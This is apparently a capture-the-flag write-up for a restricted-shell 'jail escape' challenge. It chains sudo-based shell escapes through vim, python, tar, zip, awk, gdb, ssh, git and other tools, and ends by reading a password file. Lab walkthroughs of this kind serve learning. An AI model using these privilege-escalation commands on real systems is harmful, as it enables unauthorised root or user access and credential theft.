Jail - Escape

Posted on ven. 03 décembre 2010 in Review

https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf https://d00mfist.gitbooks.io/ctf/escaping_restricted_shell.html

User 1

app-script-ch14@challenge02:~$ vim --cmd "set shell=/bin/bash" --cmd "shell"

User 2

app-script-ch14@challenge02:~$ echo $PATH /challenge/app-script/ch14/step1/ app-script-ch14@challenge02:~$ export PATH=/bin:/usr/bin app-script-ch14@challenge02:~$ id uid=1314(app-script-ch14) gid=1314(app-script-ch14) groups=1314(app-script-ch14),100(users) app-script-ch14@challenge02:~$ sudo -l Matching Defaults entries for app-script-ch14 on challenge02: env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user

User app-script-ch14 may run the following commands on challenge02: (app-script-ch14-2) NOPASSWD: /usr/bin/python app-script-ch14@challenge02:~$ sudo -u app-script-ch14-2 python Python 2.7.15+ (default, Oct 7 2019, 17:39:04) [GCC 7.4.0] on linux2 Type "help", "copyright", "credits" or "license" for more information.

import pty pty.spawn('/bin/bash')

User 3

https://gtfobins.github.io/gtfobins/tar/

app-script-ch14-2@challenge02:~$ sudo -u app-script-ch14-3 tar xf /dev/null -I '/bin/bash -c "bash <&2 1>&2"'

User 4

app-script-ch14-3@challenge02:~$ sudo -l Matching Defaults entries for app-script-ch14-3 on challenge02: env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !mail_always, !mail_badpass, !mail_no_host, !mail_no_perms, !mail_no_user

User app-script-ch14-3 may run the following commands on challenge02: (app-script-ch14-4) NOPASSWD: /usr/bin/zip

sudo -u app-script-ch14-4 zip /tmp/test.zip /tmp/jk.sh -T --unzip-command="sh -c /bin/bash"

USER 5

sudo -u app-script-ch14-5 awk '{system("/bin/bash");}'

USER 6

sudo -u app-script-ch14-6 gdb

shell

User 7

sudo -u app-script-cha14-7 pico -s "/bin/bash" /bin/bash CTRL+T

User 8

/tmp/superscript : /bin/bash - chmod +x /tmp/superscript sudo -u app-script-ch14-8 scp -S /tmp/superscript 127.0.0.1: 127.0.0.1:

User 9

sudo -u app-script-ch14-9 env /bin/bash

User 10

sudo -u app-script-ch14-10 ssh -o ProxyCommand=';bash 0<&2 1>&2' 127.0.0.1

# User 11 sudo -u app-script-cha14-11 git help status !/bin/bash mkdir /tmp/qspod cd /tmp/qspod git init touch a git add . git commit -m "a" chmod -R 777 .git sudo -u app-script-ch14-11 git rebase --interactive --exec "/bin/bash" HEAD

# User 12

vim /tmp/po {/bin/bash} chmod 777 /tmp/po sudo -u app-script-ch14-13 /usr/bin/script /tmp/po

User 13

mapfile -t a < ../.passwd echo $a

hack jail python bash shell espace cheatsheet